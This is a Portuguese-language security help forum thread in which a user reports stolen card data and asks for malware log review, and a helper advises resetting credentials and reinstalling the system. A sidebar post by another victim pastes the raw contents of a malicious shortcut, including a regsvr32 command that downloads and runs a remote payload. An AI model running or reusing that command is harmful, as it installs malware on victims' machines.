Entre para seguir isso  
Seguidores 0
LuaCarper

Dados roubados e uso do cartão de credito

2 posts neste tópico

Olá pessoal, 

Infelizmente no domingo passado tive meus dados roubados e o cartão de crédito usado para compras online, certamente foi uma "visita" a um site para baixar filmes online. 

Já comprei o avast versão completa e coloquei para rodar, ele tem encontrado alguns programas indesejados e agora há pouco acabei de receber o aviso do virus IDP.ALEXA.51

Fico um pouco insegura se somente com o antivirus eu já estou protegida ou talvez ainda tenha alguma programa escondido no pc.

Alguém poderia analisar isso pra mim? Que programas devo baixar para gerar os logs para análise? 

Meio que estou seguindo esse post aqui para gerar os logs

Mas não sei se para o meu caso é o melhor a se fazer.

Obrigada desde já!

Luana :) 

Sc Cleaner log

Adw Cleaner Log

Editado por Breaker
Remover logs

Compartilhar este post

Link para o post
Compartilhar em outros sites

Olá @LuaCarper

Pelo que eu vi, sua máquina ainda continua infectada, e isso é muito perigoso para todos nós.

Como você mesma disse, teve dados de contas e de cartões roubados; recomendo fortemente que você providencie a troca de todas as suas senhas e logins de suas contas, principalmente as bancárias, assim como uma troca de cartão bancário também se faz necessário.

O fórum não faz mais esse trabalho de desinfecção e por esse motivo o mais correcto e sensato é você fazer cópia de seus arquivos pessoais e formatar seu hd com um sistema operactivo limpo.

Somente assim você terá uma possibilidade maior de não continuar infectada mesmo após ter instalado um antivírus.

Além disso recomendo à você a leitura com afinco da cartilha de segurança disponível em: https://cartilha.cert.br/

[ ]'s

Compartilhar este post

Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
Entre para seguir isso  
Seguidores 0

• Conteúdo Similar

• Por ThiagoMaggioni
      Uso Windows 7 (ainda). Depois de configurar uma conta de email da empresa no Outlook da máquina o Avast detectou vários vírus e depois disso o computador ficou louco. O Chrome abre mas trava com as extensões e não funciona. Tentei instalar outro antivirus mas ele não permite, o Avast sumiu. Depois de reiniciar a máquina sumiram várias DLLs. Peço pra abrir um programa e ele diz que faltam DLLs. A WININET.dll eu consegui baixar na internet, mas depois ele colocou que falta uma tal de api-ms-win-core-com-midlproxystub-I1-1-0.dll. Lugar nenhum da internet achei algo sobre isso. Já tentei fazer recuperação do sistema mas também dá erro. Podem me ajudar? Estou anexando o log do Hijackthis... geralmente pedem isso, né?

• Por erickrussell
      Bom dia. 
      Creio que fui invadido e nao é a primeira vez.
      uso window s8.1 firewall comodo e antivirus avira.
      Vocês pode fazer o teste no meu notebook?
      Obrigado
    • Por mauricio reis
      Bom dia estou com problema no meu note, a barra de rolagem está indo automaticamente para baixo em páginas da web, ícones da área de trabalho, word, pdf, etc..   isso acontece com a maioria das ferramentas do sistema, seleciona automaticamente os icones da parte de baixo da area de trabalho...
      poderiam ajudar-me?
    • Por wendrel
      recebi um email ''https://uploaddeimagens.com.br/imagens/sem_titulo-png--22628'' porem quando cliquei percebi que tudo era apenas uma imagem o email todo, apos o clique começou um download de um arquivo .rar e eu achando que era um boleto mesmo cliquei e apareceu uma janela de copiando mt rapido tipo 2 segundos e dps fechou sem nenhum vestigio , abri o arquivo em modo de leitura e apareceu isso 

L       À      Fë@      ÄâÓÊÄâÓÊ€†kp Ê :                   9 PàOÐ ê:i¢Ø +00 /C:\                   R 1     Kï Windows < ï¾î:…Kï*   w                   W i n d o w s   V 1     K0" System32  > ï¾î:†K0"*   Ä                   S y s t e m 3 2   b 2  :  î:Р     regsvr32.exe  F ï¾í:Q¿í:Q¿*   á                   r e g s v r 3 2 . e x e     O         -       N       k·Ò    C:\Windows\System32\regsvr32.exe  , . . \ . . \ . . \ . . \ . . \ W i n d o w s \ S y s t e m 3 2 \ r e g s v r 3 2 . e x e N / u   / n   / s   / i : h t t p s : / / s i t e s . g o o g l e . c o m / s i t e / l o a d e r l o a d e r 1 9 9 3 / c a r v . z i p   s c r o b j . d l l / C : \ P r o g r a m   F i l e s \ I n t e r n e t   E x p l o r e r \ i e x p l o r e . e x e     %SystemDrive%\Program Files\Internet Explorer\iexplore.exe                                                                                                                                                                                                          % S y s t e m D r i v e % \ P r o g r a m   F i l e s \ I n t e r n e t   E x p l o r e r \ i e x p l o r e . e x e                                                                                                                                                                                                                                                                                                                                                                                                                         %   Õ       wNÁç]N·D.±®Q˜·Õ             1   1SPSà…ŸòùOh«‘ +'³Ù                   …   1SPSâŠXF¼L8C»ü“&˜mÎi         ,   S - 1 - 5 - 2 1 - 3 5 0 0 9 6 4 3 4 6 - 7 4 8 5 1 6 7 8 5 - 5 5 9 9 6 2 4 7 8 - 5 0 0           `     X       200-98-119-60   \®|"°a¶B®¼¡£”¥+qaxUvç¿4 PV9$\®|"°a¶B®¼¡£”¥+qaxUvç¿4 PV9$    

arquivo rar segue em anexo

• Por menezesrenan7
      Olá,
      Estou com um sério problema.
      Meu notebook está muito lento, tanto na inicialização quanto no uso... e olhe que ele tá assim mesmo depois de ter formatado.
      Além disso, o teclado está desconfigurado. Toda vez que surge um campo pra escrever, o teclado escreve sozinho um monte de "1" ou "-".
      O touchpad também trava de vez em quando.
      Segue em anexo os logs dos app que vcs sugeriram rodar.

• Quem Está Navegando   0 membros estão online

Nenhum usuário registrado visualizando esta página.